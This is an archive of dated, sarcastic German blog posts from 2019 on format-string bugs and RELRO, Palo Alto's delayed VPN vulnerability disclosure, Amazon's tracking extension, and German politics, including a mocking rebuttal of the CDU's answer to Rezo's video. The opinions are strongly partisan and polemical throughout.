Die printf-Implementation der dietlibc unterstützt %n schlicht gar nicht. Microsoft hatte das aus der Visual Studio Runtime auch per Default deaktiviert und man muss das von Hand anschalten.
Der Punkt mit ASLR und RELRO stimmt auch, aber das ist halt eine Mitigation-Schlacht am Ende. Da bin ich kein Fan von. Damit wird das Exploiten dann schwieriger, ja, aber der Bug ist nicht weg. Und durch die großartige Softwarequalität da draußen haben wir die User konditioniert, dass sie sich selbst nach Crashes neustartende Software nicht nur tolerieren sondern gutheißen, und dass die Leute sich an ständige Segfaults in ihren Logs gewöhnt haben und kaum noch jemand überhaupt guckt. Im Übrigen hat RELRO auch Nachteile. Die Relokationen müssen alle am Anfang gemacht werden, damit danach die Relokationstabelle read-only sein kann, und das führt bei manchen Szenarios zu merkbaren (nicht nur messbaren) Verlangsamungen, besonders bei großen C++-Programmen mit Tonnen von Shared Libraries, z.B. KDE oder so.
Insofern: Ja, der Punkt mit RELRO ist korrekt, und die Linux-Distributionen haben angefangen, komplett auf RELRO umzustellen. Die CPUs sind ja auch schnell genug. Ich erinnere mich noch, als man kleinere Programme statisch gelinkt hat, weil dynamisches Linken zu langsameren Startup-Zeiten geführt hat. Deshalb ja auch dietlibc als statische Library für kleine Programme.
Ich würde die aber viel lieber dafür kritisieren, dass ihre Software kacke ist, als dass sie auch noch die Best Practices bei den Compiler-Flags verkackt haben. Nicht dass da draußen jemand denkt, Format-String-Bugs seien nicht so schlimm, wenn man RELRO anmacht oder so. Fixt eure fucking Bugs.
Früher war der Developer für die Bugs und der Ops-Typ für das Bauen und Ausrollen zuständig, und der hat sich dann um RELRO gekümmert. Heute mit Devops oder gar Devsecops machen das dieselben Gestalten, und damit ist dann plötzlich Zeit für RELRO nicht mehr für das Fixen von Bugs da. Das ist zum Kotzen und einer der Gründe, wieso Devops und Devsecops Mist ist.

Sun Jul 21 2019

[l] Wo wir gerade bei wieseligen IT-Startups sind: Der VPN-Endpunkt von Palo Alto Networks hatte einen pre-auth remote code execution bug, mit anderen Worten: Etwas, aus dem man prima einen Wurm bauen kann.
Wenn ich König wäre, würde diese Firma sofort zerschlagen und die Mitarbeiter bekämen alle lebenslang Computerverbot. Aber micht fragt ja keiner.
Aber ihr erwartet jetzt vielleicht, dass Palo Alto wenigstens sofort ein CVE beantragt und das öffentlich gemacht hat, um ihre Kunden zu schützen. Nein, haben sie nicht.
Palo-Alto have now created a security bulletin for this and requested a CVE (cve-2019-1579 pending assigning). The issue is over a year old and absolutely critical as a 100% reliable preauth RCE VPN exploit using format strings, highly recommend you patch.
Ein Jahr! Sportlich!!
Zum Vergleich: Die Sowjetunion brauchte weniger lange, um Tschernobyl zuzugeben.
Ich reagiere da so bissig, weil das eine Security-Firma ist. Angeblich. Also ... Schlangenöl, natürlich. Aber die haben den Leuten die Kohle aus der Tasche gezogen mit dem Versprechen, sie vor Würmern zu beschützen. Und tatsächlich haben sie den Würmern einen praktisch idealen Installationsvektor in die Hand gegeben.
Update: Die heißen übrigens nur Palo Alto, die kommen nicht aus Kalifornien. Der Gründer ist Israeli und war vorher bei Checkpoint. Nicht dass das irgendeine Rolle spielt, aber wenn die Firma dich schon mit ihrem Namen belügt, ... (Danke, Axel)

Fri Jul 19 2019

[l] Nur in Deutschland kann es passieren, dass das Geschwister-Scholl-Gymnasium Bußgelder gegen Schüler wegen Fridays-for-Future-"Schwänzen" verhängt. Mich nervt das ja schon länger, wenn Schulen nach irgendwelchen Helden benannt werden. Das sollte etwas sein, das man sich durch entsprechendes Verhalten erarbeitet, dass man nach einem Helden benannt wird. Das sollte nicht gemacht werden, um den Helden zu ehren. Denn das ist keine Ehrung, wenn eine beschissene Bürokratur-Behörde nach dir benannt wird. Das ist eher eine Beleidigung.

Thu Jul 18 2019

[l] Wo wir gerade bei Amazon waren: Amazon hat ihren US-Kunden einen $10-Einkaufsgutschein angeboten, wenn sie dafür eine Tracking-Browsererweiterung namens "amazon assistant" installieren. 7 Millionen (!!!) haben mitgemacht.
Bei derart düsteren Meldungen frage ich mich, ob wir nicht zu weit gegangen sind bei der modernen Medizin. Wenn man die Evolution daran hindert, schwache DNA auszusortieren, dann kann das doch nur den Bach runtergehen! Und jetzt bekämpfen wir auch noch die Anti-Vaxxer und führen keine Kriege in Europa mehr!1!!
Update: Ein Leser weist darauf hin, dass es ein ähnliches 10€-Angebot auch in Deutschland gibt. Nachdem man Einkäufe über 25€ mit der Browser-Extension getätigt hat.

Wed Jul 17 2019

[l] Ein Leser schlug noch "Kramp-Knarrenbauer" vor für unsere neue Verteidigungsministerin. Ich mache mir da nicht viel Sorgen. Die Frau strahlt auf mich genau die richtige Menge an Inkompetenz gepaart mit Ego aus, dass ich annehme, sie wird sich voll auf die etablierte Berater-Infrastruktur verlassen, die ihre in der Beziehung vergleichbare Vorgängerin ihr hinterlassen hat.
Bei AKK-47 ist die Abwicklung der Bundeswehr in guten Händen. Schaut nur an, wie sie eigenhändig die CDU abgewickelt hat!
Findet das eigentlich noch jemand so lustig, dass der aktuelle Gesundheitsminister zum Kriegsminister gemacht werden sollte? Das ist ja mal eine bemerkenswerte Aussage über die Kompetenz von einem Gesundheitsminister, oder nicht? Das ist so schlecht, dass wir ihn lieber für das Gegenteil zuständigt machen?

Thu Jun 27 2019

[l] Neues von den Olivgrünen!
Gewissensgründe würden ihn "nicht mehr daran hindern, in der Bundeswehr zu dienen". Grünen-Politiker Lindner hatte einst den Wehrdienst verweigert. Das hat er jetzt rückgängig gemacht - für eine Wehrübung.

Thu Jun 20 2019

[l] Zu Intel gegen AMD kam hier noch ein Leserbrief mit Details zu Intels neuen CPUs rein:
Bei diesen Cores hat Intel folgendes gemacht:
- L1D Cache 32KiB -> 48KiB
- L2 Cache 256KiB -> 512KiB
- L2 TLB 1536 -> 2048 entries
- µOp Cache 1536 -> 2304 opcodes
- out of order opcodes in the flight (OoO window) 224 -> 352 opcodes
- integer pipelines 4 -> 5
- execution ports 8 -> 10
Dies sind die Änderungen, die so richtig Auswirkungen auf die IPC haben. Es gibt noch weitere kleinere aber gute Änderungen wie 2x AVX2 Units (die aber nur jeweils ne 256 Bit Bandbreite haben).
Allerdings gibt es auch gravierende Nachteile, über die Intel nicht spricht. Der Yield bei diesen Chiplets ist übel, richtig übel. Wenn Intel damit Gewinn macht, dann aber nur minimalen. Die Cores sind darüberhinaus bei hohen Taktzahlen ziemlich instabil. Es gibt keine, die auch nur mit einem Single-Core Turbo über 4 GHz kommen. Bei gleichzeitiger Auslastung aller Cores sind mit Mühe und Not 3,5 GHz erreichbar. Mehr als 4 Cores pro Die sind im Moment nicht realisierbar,
Das klingt dann gleich viel weniger positiv. Na wir werden sehen :-)

Mon Jun 17 2019

[l] Mein Hobby: Idioten beim sich um Kopf und Kragen regen zuhören. Heute: Das Innenministerium demonstriert Inkompetenz.
Das Bundesinnenministerium ist dem Vorwurf entgegengetreten, es wolle Anbieter von Messenger-Diensten wie WhatsApp zur Entschlüsselung der Kommunikation ihrer Nutzer zwingen. Die Bundesregierung halte an dem Prinzip "Sicherheit durch Verschlüsselung und Sicherheit trotz Verschlüsselung" fest, sagte ein Sprecher der dpa. Er betonte: "Wir wollen weiterhin keine Hintertüren oder Verschlüsselungsverbote."
Nee, wir wollen keine Hintertüren oder Verbote! Wir drohen aber mit Verboten, damit wir Hintertüren kriegen!
Damit Terroristen und Bandenmitglieder ihre Kommunikation nicht durch die Nutzung verschlüsselter Messenger-Dienste komplett abschotten könnten, müssten die Provider aber einen "staatlichen Zugriff als gesetzlich geregelte Ausnahme" ermöglichen. Einen Gesetzentwurf hierzu gebe es jedoch noch nicht, sagte der Sprecher. "Wir stehen hier noch am Anfang einer Lösungsfindung."
Seht ihr? Eine Ausnahme, keine Hintertür!1!!
Ich glaube ja, dass die inzwischen aktiv nach Dingen Ausschau halten, mit denen die Regierungen anderer Länder sich zum Gespött der Welt gemacht haben, und das machen die dann auch. Morgen: Wir bauen eine Mauer um Italien, gegen die Flüchtlinge!!1!

Sat Jun 15 2019

[l] Leserbrief zur Iran-Situation:
Als ich noch Seemann bei der Handelsflotte (der DDR) war, ist unser Schiff zumindest von einem iranischen Kriegsschiff auf offener See aufgebracht und durchsucht worden. Also ohne dass wir dabei oder vorher oder irgendwann in iranischen Hoheitsgewässern waren. Unsere Zielhäfen waren einmal die Emirate gewesen (Dubai) und einmal Kuwait. Das lief mit Waffendrohung ab, auch eindeutig über Funk mit der entsprechenden Ansage. Dann Bewaffnete an Bord u.s.w.
Außerdem trieben zu dieser Zeit zahlreiche Seeminen im Persischen Golf, die etliche Handelschiffe erwischt hatten. Meiner Erinnerung nach sind die damals recht eindeutig dem Iran zugeschrieben worden und die haben auch damals immer probiert, offiziell auf unschuldig zu mimen. Wir durften uns damals nicht zu mehreren Leuten an einer Stelle auf dem Schiff aufhalten, gemeinsame Mahlzeiten, Kino und solche Dinge waren auch untersagt.
Also auch wenn die anderen Beteiligten misstrauisch beäugt werden müssen: Ich traue denen die Angriffe auf Handelschiffe zu. +Definitiv.
Da ist mein Bild vom Iran möglicherweise zu rosig bisher.
Update: Auf Nachfrage, ob das nicht Piraterie ist, und man sich dagegen wehren kann, kamen noch ein paar mehr Details:
Die haben damals das Schiff durchsucht. Vor allem die Ladung, aber auch sonst. Wir (als Matrosen) hatten damals den Eindruck, dass die Schiffsführung sowas durchaus mit einberechnet hatten. Als die iranischen Schiffe in Sichtweite kamen, kriegten wir Matrosen jedenfalls vorbereitete Zettel mit Containerstellplätzen in die Hand gedrückt, wo wir in Affengeschwindigkeit die Zettel abkratzen sollten. Begründung uns gegenüber: Die bringen Schriffe auf, die Ladung für den Irak an Bord haben (damals Krieg Iran-Irak), wir haben spekuliert, dass da Waffen oder sowas drin war, wussten es aber nicht. Ladung wurde vor der Mannschaft (auch aus kommerziellem Interessse, Diebstählen, geplanter Piraterie u.s.w.) möglichst geheimgehalten. Und wir hatten auch keine rote Lampe im Top, also keine "gefährliche Ladung" an Board. Die wurde normalerweise immer angemacht, wenn was war, selbst bei Munition o.ä., deren Transport man uns gerne nicht mitgeteilt hat. Vermutlich hat das auch knallharte Versicherungsgründe.
Nach der Durchsuchung durften wir weiterfahren, weil die nichts gefunden hatten.
Klar hätten die das niemals gedurft nach dem internationalen Seerecht. Aber die REederei wird sich sich eher gefragt haben, ob sich eine Klage oder Ähnliches rechtet. Jeder Kapitän muss selber rechnen, und da denken die gerne kurzfristig, ob ein Aufwand was bringt oder nicht. Also werden die das weitergemeldet haben und dann gings schlicht weiter im Tagesgeschäft. Und wir kriegten 20 Mark der DDR pro Tag "Kampfgebietsźulage", na großartig.

Wed Jun 12 2019

[l] Wir hatten lange keinen Fall mehr, wo jemand ein Dokument vor Kameras herumwedelt und die Kameras sind hochauflösend genug, um den Inhalt lesen zu können. Donald Trump hat das gerade mit dem "geheimen" Mexiko-Plan gemacht. :-)

Sat Jun 8 2019

[l] Wow ich bin ja echt erschüttert, wie viele von euch immer noch auf so neoliberale Bertelsmann-Talkingpoints reinfallen. Jahrelang haben sie euch mit der Vorstellung verarscht, dass man sich hocharbeiten kann, wenn man sich nur ordentlich ausbeuten lässt. Jetzt versprechen sie nicht mal mehr eine Chance, sondern sie bieten dir an, dass du dich mit anderen Betroffenen in einer Selbsthilfegruppe im Kreis bemiteiden kannst, wie übel du von den Umständen und den fiesen Rassisten/Sexisten/*isten unterdrückt wirst. Da ist nicht mal der Versuch eines Versprechens.
Und ich habe hier bestimmt 10 Mails von Leuten gekriegt, die mir erzählen wollten, dass das doch viel besser ist so. Immerhin ist der Corbyn ehrlich. Und jetzt will er allen helfen, nicht nur denen, die Leistung bringen.
Wo kommt soviel Naivität her? Habt ihr alle weggeguckt die letzten 40 Jahre?!
Ich glaube ja, das ist ein Indiz dafür, dass die Automatisierung weit genug vorangeschritten ist, dass die Bonzen keine Selbstausbeuter mehr brauchen. Die brauchen überhaupt keine Arbeiter mehr. Die haben sich mit Automatisierung vom Pöbel unabhängig gemacht. Die haben es nicht mehr nötig, euch ins Gesicht zu lügen, dass ihr euch hocharbeiten könnt. Es reicht offensichtlich, die Unterschichten sich gegenseitig mit Social Justice und Grievance Studies bekämpfen zu lassen. Die Zeiten, wo Arbeiter solidarisch waren und in Gewerkschaften zusammengetan haben, um füreinander einzustehen, sind vorbei. Heute bekämpfen sich die Arbeiter gegenseitig. Anstatt den Bonzen gemeinsam Paroli zu bieten, ruft man sie als Autoritätsperson an, um andere rausschmeißen zu lassen, weil die auf der Social-Justie-Skala um eine Graustufe vom wahren Pfad abwichen.

Fri Jun 7 2019

[l] Burger King hat in New York Veganern Rindfleisch-Burger geliefert statt der veganen Fake-Fleisch-Burger. Burger King hat da gerade einen Feldversuch, aber die Veganer haben halt auch in anderen Gegenden Veganer-Burger geklickt. Burger King hat denen dann normale Burger geliefert, und den Fahrern gesagt, sie sollen den Kunden mitteilen, dass das normale Burger sind. Das haben aber offenbar nicht alle Fahrer tatsächlich gemacht.

Wed Jun 5 2019

[l] Die Polizei hat in Australien beim öffentlich-rechtlichen Fernsehen ABC eine Hausdurchsuchung gemacht.
Naja, Five Eyes-Country halt. Die haben da halt andere Wertvorstellungen als eine freiheitliche Demokratie wie wir hier. Bei UNS wäre sowas un-denk-bar! Wenn es ein Land gibt, in dem Pressefreiheit ein hohes Gut ist, dann ja wohl ganz klar unseres!!1!
Seid ihr eigentlich auch so froh, dass ihr nicht in Australien wohnt? Wo die Pressefreiheit mit Füßen getreten wird?

Sun Jun 2 2019

[l] Nahles gibt ihre Posten als Partei- und Fraktionschefin auf. Sie hat sich auf dem Posten nicht mit Ruhm bekleckert, aber man muss da auch mal die Kirche im Dorf lassen und das Umfeld betrachten. Schaut euch nur mal an, mit welchem Material sie da zu arbeiten hatte. War ja klar, dass die erst eine Frau ranlassen würden, als sie sich sicher waren, dass das zum scheitern verurteilt ist.
Ich finde, wir sollten jetzt nicht über ihre Nachfolge reden, sondern über den Termin, bei dem dieses Schlagloch von einer Partei ganz zugemacht wird.

Wed May 29 2019

[l] OLG Karlsruhe bestätigt das Verbot des ersten Docmorris-Medikamente-Dispensers. Das ist so eine Art Verkaufsautomat, aber man zieht da nicht einfach Pillen sondern man macht Videochat mit einem Apotheker in der Ferne und der kann dann Medikamente rausgeben.
Was diese ganze Geschichte sehr asselig macht, ist dass der Automat in einem Kaff steht, und zwar nicht auf der grünen Wiese sondern in dem Gebäude, in dem früher die örtliche Apotheke war. Die hat irgendwann zugemacht und die Alten in der Gegend mussten für ihre Blutdruckmittel mehrere Kilometer weit zur nächsten Apotheke fahren.
Docmorris hat dann da diesen Automaten aufgestellt, und Apotheker von woanders haben dann dagegen geklagt.
Die Leidtragenden sind die Leute, die von der Vorgängerapotheke im Regen stehengelassen wurden.

Tue May 28 2019

[l] Axel Voss zum Europaabgeordneten des Jahres gewählt. Von irgendeinem belanglosen Magazin, von dem noch nie jemand was gehört hat. Aber macht nichts. Ich schließe mich dem an. Niemand hat sich wie Axel Voss um die Verbesserung des Niveaus im Europaparlament verdient gemacht. Ich finde immer noch, der hat einen Präsentkorb verdient.
Aber wer gerade keine Snacks aus Präsentkörben zu sich nehmen sollte, ist Annegret Kramp-Karrenbauer. Bloomberg gerüchtet, dass Merkel mit ihrer Performance unzufrieden genug ist, um sich jemand anderen als Nachfolger zu suchen. Na dann … viel Erfolg, Angela! Die Partei ist ja voll von erfahrenem Personal. Wie wäre es mit Günther Oettinger? Kaum jemandes (aus der CDU) Videos werden von Jugendlichen so häufig rezipiert wie seine, besonders die auf Englisch!

Sun May 26 2019

[l] Spanien "ist technisch gesehen keine Demokratie mehr", seit vier gewählte katalanische Abgeordnete suspendiert wurden.
Vier gewählte katalanische Untersuchungsgefangene wurden nun nach einer Entscheidung des neuen spanischen Parlamentspräsidiums mit den Stimmen der Parteien suspendiert, die auch schon die Zwangsverwaltung für Katalonien über den Paragraphen 155 bestimmt hatten.
Ja super!
Update: Ein Leser schickt mir ein Zitat aus der Süddeutschen Zeitung vom 23. Mai:
“Für Aufregung wird wohl der nach Belgien geflüchtete Ex-Premier Kataloniens, Carles Puigdemont, sorgen. Als Spitzenkandidat einer separatistischen Liste hat er sehr gute Chancen [ins Europaparlament] gewählt zu werden. Doch seine Ernennungsurkunde müsste er in Madrid abholen, wo ihm die Verhaftung droht."
Die Spanier haben ja auch die Franco-Stiftung nicht zugemacht. Demokratie wird eh total überbewertet!1!!

Fri May 24 2019

[l] Liebe PARTEI. Ihr habt doch Geld für Aktionen. Schickt doch bitte mal dem Axel Voss einen Präsentkorb. Der hat sich echt um die Zerstörung der CDU verdient gemacht.
Das ist euer bester Mann!
[l] Steht ihr auf so TV-Serien-Finale-Episoden? Der große Endkampf? Wo sie nochmal alle Figuren hervorholen? Und jeder hilft mit?
Nun, stellt sich raus, dass Rezo nicht der einzige Youtuber ist, der gerne noch einen bewohnbaren Planeten hätte, wenn die CDU-Politiker an Altersschwäche verstorben sind. Voll Avengers-Style, das Video. Krasse Scheiße.
Ich brauche ja nicht häufig ein Taschentuch bei Youtube-Video. Das war so eines. Selbst irgendwelche Beauty-Kosmetik-Youtuber haben mitgemacht. Krass.
Update: Ich persönlich hätte ja noch sowas hier in den Hintergrund gelegt :-)
[l] Ach gucke mal! Man muss nur ne Woche vor der Europawahl ein CDU-Zerstörungsvideo mit 5 Mio Views machen, dann kriegt man die CDU plötzlich auch zu inhaltlichen Aussagen!
Ja also wenn wir DAS gewusst hätten, hätten wir das schon viel früher probiert!1!!
Na dann gucken wir doch mal. Professionell layoutet, schöne Schriftart, fette Nationalfarben auf dem Titelblatt, da waren Krisen-Profis am Werk!
In unserem freien Land darf jeder seine Meinung äußern, Gott sei Dank.
Direkt 150 Punkte Abzug für diese schnöselige Altherren-Herabwürdigung.
Wir - das sind Hunderttausende Mitglieder, Unterstützer und Millionen von Wählerinnen und Wählern der CDU - nehmen Kritik sehr ernst
Oh, ach? Ihr Anruf ist uns sehr wichtig! Bitte bleiben Sie in der Leitung! Direkt noch 250 Punkte abzug.
Und wir alle, die allermeisten ehrenamtlich, arbeiten jeden Tag daran, es besser zu machen.
Und dann noch ein peinlicher Tränendrüsen-Drücker für die armen ehrenamtlichen Minister und Kanzler, die uns die letzten 30 Jahre in Grund und Boden regiert haben. Tja da könnte sich die SPD mal was von abschneiden! Die haben Gehälter kassiert, die fiesen Sozsen!! Würden wir bei der CDU nie machen, wir haben schließlich schwarze Kassen mit jüdischen Vermächtnissen! Nochmal 100 Punkte Abzug.
Wir als CDU sind stolz darauf, was wir, die Partei von Adenauer, Kohl und Merkel und die Bürgerinnen und Bürger in den letzten Jahrzehnten für unser Land und die Menschen in Deutschland erreicht haben.
Oh ach so, sagt das doch gleich! Das Papier will gar nicht mit mir reden sondern mit verunsicherten CDU-Wählern! Ja, äh, gut, … hmm. Und jetzt? Weiterlesen?
Die CDU ist eine Volkspartei mit vielen Mitgliedern und auf Werten gebauten Programmen.
Oh wow. Pathetische Schwurbelscheiße. Um die CDU scheint es noch schlimmer zu stehen als ich annahm, wenn die so tief in die Fremdschäm-Kiste greifen.
Wir sind entstanden aus den Trümmern eines zerstörten Landes
Oh Gott. Das wird ja immer schlimmer. Was kommt als nächstes? Die Vertrauens-Floskeln?
Wir sind deshalb Volkspartei, weil uns viele Bevölkerungsschichten vertrauen
Ja! Oh Mann. Da kriege ich ja fast Mitleid mit der CDU! Aber dann denke ich darüber nach, wie die uns in Grund und Boden gewirtschaftet haben in den letzten 40 Regierungsjahren, und dann legt sich das wieder.
Das können die nur noch toppen, wenn sie die Millionen-Fliegen-Floskel bringen.
Wir werden seit Jahren häufiger als andere Parteien gewählt
Und da ist sie! *Tusch* Fresst Scheiße! Millionen Fliegen können nicht irren!
Wisst ihr was? Da stellt sich eigentlich nur noch die Frage, um welchen Aspekt sie sich am meisten Sorgen machen, und den sie daher nochmal am Ende ansprechen.
Die Währung von YouTubern sind Klickraten. Die Währung einer Volkspartei wie der CDU ist Vertrauen.
Da haben wir es! Das ist eine gute Nachricht. Die CDU hat gemerkt, dass ihr niemand mehr vertraut. Gut so.
Ich glaube ich blättere mal vor. Die Einleitung geht ja schon mal GAR nicht.
Kapitel 1. Die Sache mit der ungerechten Verteilung. Der Vorwurf ist: Der Reichtum ist ungerecht verteilt. Die CDU antwortet:
Vorne weg eine Richtigstellung: Die Einkommensungleichheit, d.h. die unterschiedliche Verteilung der Einkommen in Deutschland,ist zwar bis 2005 gestiegen, seitdem aber nicht mehr.
Klassisches Ablenkungsmanöver. Funktioniert bei Alzheimerpatienten wie der CDU-Wähler-Altersschicht bestimmt prima. Die merken vielleicht wirklich nicht, dass der Vorwurf die Ungleichheit beim Vermögen war, nicht beim Einkommen. Das Einkommen ist auch kein sinnvolles Maß an der Stelle, weil man das Einkommen als reicher Geldsack wegoptimieren kann. Z.B. kann man einen Kredit bei einer Bank aufnehmen, und seine Aktien als Sicherheit hinterlegen. Dann lebt man von dem Geld, das die Bank einem als Kredit ausgezahlt hat, setzt die Zinsen von der Steuer ab, und zahlt den Kredit dann mit anderen Miet- oder Zinseinkünften ab. Oder das Geld "arbeitet" in einer Steueroase. Da gibt es diverse Tricks. Das ist ja gerade eines der Probleme, an der die CDU die Schuld trägt, dass es für Reiche so viele gute Tricks gibt, sich das Einkommen kleinzurechnen und am Ende keine Einkommenssteuer zu zahlen. Apropos Einkommenssteuer. Da reitet die CDU gerne drauf herum, weil die von den Ärmsten nicht gezahlt wird, deren Gehalt zu gering ist. Die CDU stellt das dann gerne so dar, seht her, die Reichen zahlen die ganzen Einkommenssteuern. Und das stimmt auch, aber es ist gleichzeitig ein Taschenspielertrick, denn die Armen kaufen ja trotzdem im Einzelhandel und zahlen Mehrwertsteuer auf alles. Und weil bei den Armen ein größerer Teil des Geldes für Essen und Kleidung und Strom und Wasser draufgeht, ist bei denen auch der Anteil der Mehrwertsteuer an den Ausgaben krass viel höher als bei den Reichen. Den Aspekt erwähnt die CDU natürlich lieber nicht.
Die Antwort darauf ist übrigens historisch, dass es in Deutschland zwei Mehrwertsteuersätze gibt, einmal normal und einmal ermäßigt, und der ermäßigte ist dann für Nicht-Luxus-Güter, die man zum Überleben braucht. Der ermäßigte Satz liegt bei 7%, der reguläre bei 19. Der nächste Taschenspielertrick der CDU ist, dass sie hier das Wort "die Reichen" umzudefinieren versucht. Leute wie Friede Springer werden jetzt keine Millionen an Lohnsteuer abführen. Rezo sprach explizit von den reichsten 45 Haushalten in Deutschland. Die CDU deutet das heimlich um, so dass es auch die nächsten paar Mio beinhaltet.
Kapitel 2. Bildungspolitik. Rezos Kritik handelte von Aufstiegschancen durch und Zugang zu Bildung. Da geht es erstens darum, dass jeder ordentliche Bildungschancen haben soll, auch wenn die Eltern arme Einwanderer aus einem anderen Sprachraum waren, aber es geht zweitens auch darum, dass man mit einem Abschluss auch einen Job findet. Wenig überraschend betrachtet die CDU den zweiten Teil nicht, den die Folgen der Automatisierung und jetzt Digitalisierung hat sie vollständig verpennt und wir alle sitzen jetzt auf dem Trümmerberg, den die CDU da zu verantworten hat. Da gibt es auch keine Ausreden. Die CDU führt an, aber man könne ja jetzt auch ohne Abi studieren. Dass heute studierte Fachkräfte Burger flippen, weil sie keinen Job finden, das erwähnen sie nicht mal. Der nächste Taschenspielertrick. Die müssen ja enorm belämmerte Wähler haben, dass sie mit solchen Methoden bisher Erfolg hatten!
Ein Lacher am Rande ist übrigens, dass Rezo meinte, CDU-geführte Bundesländer hätten weniger Ausgaben für Bildung. Die CDU kontert mit einer Grafik, wo Berlin (!) ihren Durchschnitt rausreißt. Ja, richtig. Berlin. Mit der zuständigen Senatorin von der SPD. Ach komm, unsere Wähler sind alt und gebrechlich, malen wir ein paar Deutschlandfarben drauf, das merken die NIE!
Kapitel 3: Klimawandel. Noch so ein Totalschaden-Thema für die CDU. Da können sie inhaltlich nicht viel reißen. Also eröffnen sie direkt mit einer Nebelgranate:
Rezo hat Recht: Die AfD ist die einzige Partei in Deutschland, die den menschengemachten Klimawandel leugnet.
HAHAHAHA, Oh Mann! Wie peinlich ist DAS denn! Und dann rechnen sie uns vor, dass Deutschland ja bloß 2,3% der CO2-Emissionen macht und China und die USA ja viel mehr.
Waren die nicht anwesend, als China fett auf Solar gesetzt hat, nachdem unsere Subventionen in China eine Konkurrenzwirtschaft zu unseren Solarfirmen ausgelöst hatten und im Ergebnis plötzlich Solarstrom biliger als Kohlestrom wurde? War die CDU da im Mittagschlaf oder was? China investiert inzwischen mehr in erneuerbare Energien als Europa. Tolle Wurst, liebe CDU! Das wäre unsere Chance gewesen, mal in einem zukunftsträchtigen Industriegebiet führend zu sein. Jetzt patentieren uns die Chinesen die Butter vom Brot. Danke, Angela Merkel!
Glaubt ihr nicht? Wird noch geiler! Die CDU beruft sich auf ihre "Erfolge" bei Klimagipfeln. Hier findet ihr, was wirklich passiert ist.
Aber hey, wir reden hier von der CDU. Natürlich lügt die uns ins Gesicht! Wer das noch nicht mitgekriegt hat, hat die letzten 50 Jahre nicht aufgepasst!
Kapitel 3: Krieg. Die CDU sieht auch hier kein Land und eröffnet daher direkt mit einem Ad-Hominem:
Rezos flappsiger Hobby-Spruch Richtung USA („Kriege als Hobby“) wird unserer Ansicht nach der Lage nicht gerecht.
Wartet, wartet, wird noch geiler!
Die USA und ihre Verbündeten bekämpfen den Terrorismus aufgrund der Angriffe auf New York und Washington am 11. September 2001, bei denen fast 3000 Menschen ums Leben kamen.
Oh ach SO ist das!!1! Gut, dass wir das mal geklärt haben!
Sie bekräftigt die Selbstverteidigungsklausel des Art. 51 der Charta der Vereinten Nationen und damit das individuelle und das kollektive Recht zur Selbstverteidigung auch nach Terrorangriffen.
Daher jetzt Drohnen-Vorwärtsselbstverteidigung gegen Syrien, denn da kamen Null der 9/11-Terroristen her. Ebenso steht es um Libyen, den Irak, den Iran und Afghanistan. Aus Ägypten kam immerhin einer, aber der hatte seinen Wohnsitz in Deutschland.
Tja und da haben wir es. Die Antwort war das Papier nicht wert. Aber immerhin hatten wir eine Antwort und nicht wie sonst nur eine Kanzlerinnen-Raute und Hohlphrasen ala "wir müssen jetzt alle zusammenarbeiten".
Die gute Nachricht: Es bleiben immerhin keine Fragen offen, für wie blöde die CDU ihre potentiellen Wähler hält.
Update: Das Bildblog lässt sich auch nicht lange bitten. (Und hier noch ein Lacher am Rande.
Update: Noch mehr inhaltliche Kritik am CDU-PDF.
Update: Volker Quaschning zerlegt die CDU-Äußerungen zum Klimawandel noch nachhaltiger als ich. Das ist einer der Experten, die auch in Rezos Video auftauchten aus seinem Auftritt in der Bundespressekonferenz. Money Quote:
In Polen sind zwischen 1990 und 2016 die Gesamt-Emissionen sogar um 30,5 Prozent gefallen, in Rumänien sogar um 63,8 Prozent [UNF19]. Das bedeutet aber nicht, dass beide Länder hinsichtlich Klimaschutz besondere Vorreiter sind. In diesen Ländern sind genau wie in der ehemaligen DDR die Emissionen durch wirtschaftliche Umbrüche in den 1990er-Jahren stark eingebrochen. Ein größerer Teil des Emissionsrückgangs in Deutschland ist auf Wiedervereinigungsgewinne zurückzuführen. Der Rückgang im Jahr 2018 hat zu größeren Teilen witterungsbedingte Ursachen [UBA19].
Das, meine Damen und Herren, sind die Erfolge, die die CDU euch zu verkaufen versucht.

Wed May 22 2019

[l] Geschichten aus der Neuen Welt: Washington erlaubt jetzt Begräbnis durch Kompostierung. Wie, Begräbnis ist doch Kompostierung dachtet ihr? Es gibt da Unterschiede! Deren Prozess ist angeblich "in ein paar Wochen" durch und dann kommen zwei Schubkarren Erde raus, mit denen man dann seinen Garten bestreuen kann. Und:
Supporters say the method is an environmentally friendly alternative to cremation, which releases carbon dioxide and particulates into the air, and conventional burial, in which people are drained of their blood, pumped full of formaldehyde and other chemicals that can pollute groundwater, and placed in a nearly indestructible coffin, taking up land.
Wait, what? Kann das mit dem Formaldehyd jemand aus der Branche bestätigen?! Das klingt ja erstmal wie eine krude Verschwörungstheorie ala "Die Sargmafia will bloß, dass dein Körper sich nicht zersetzt, damit sie länger Grabstellengebühren kassieren können!1!!"
Update: Die Einsendungen der Leser sind sich einig, dass das in den USA historisch bedingt so üblich ist, damit die Familie ein paar Wochen Zeit hat, aus dem ganzen Land zusammenzukommen, und den offenen Sarg zu sehen. Bei uns wird das wohl nicht gemacht. Einer schreibt:
mit 4,5 Jahren Arbeitserfahrung als Arzt in der Rechtsmedizin kann ich zur Aufklärung der mit Formaldehyd o-ä. konservierten Leichen leisten.
Bei uns werden nur Leichen für Anatomiekurse etc. fixiert. Früher geschah das mit Formaldehyd, mittlerweile hat da jedes Institut seine eigene Fixierungslösung. Ziel ist es die Proteine in den Zellen zu denaturieren, damit die sich nicht weiter zersetzten. Die Leichen aus der Anatomie müssen in Deutschland kremiert werden.
Die Amerikaner lieben das Aufbaren der Leichen. Leider vergammeln diese schon innerhalb weniger Tage sehr unansehnlich (optisch und auch geruchsmäßig), so dass solche Leichen tatsächlich routinemäßig fixiert werden. Formaldehyd ist da super günstig. Dort werden die fixierten Leichen dann im Sarg aufgebart und dann in dem Sarg beerdigt. Da gibt es tatsächlich ein Umweltproblem mit Leichen und Leichenresten, die ja nicht verwesen.

Mon May 20 2019

[l] Ui, die FPÖ hat tatsächlich alle ihre Minister zurücktreten lassen. Mann, da bin ich ja froh, dass ich rechtzeitig meine strategischen Popcornreserven aufgefüllt habe.
Ich persönlich halte das ja für eine Chance. Jetzt kann die Bevölkerung sehen, dass alles wunderbar weiterläuft so ganz ohne die ganzen Minister. Man braucht gar keinen Innenminister, stellt sich raus! Die Belgier haben gezeigt: Man braucht eigentlich überhaupt keine Regierung.
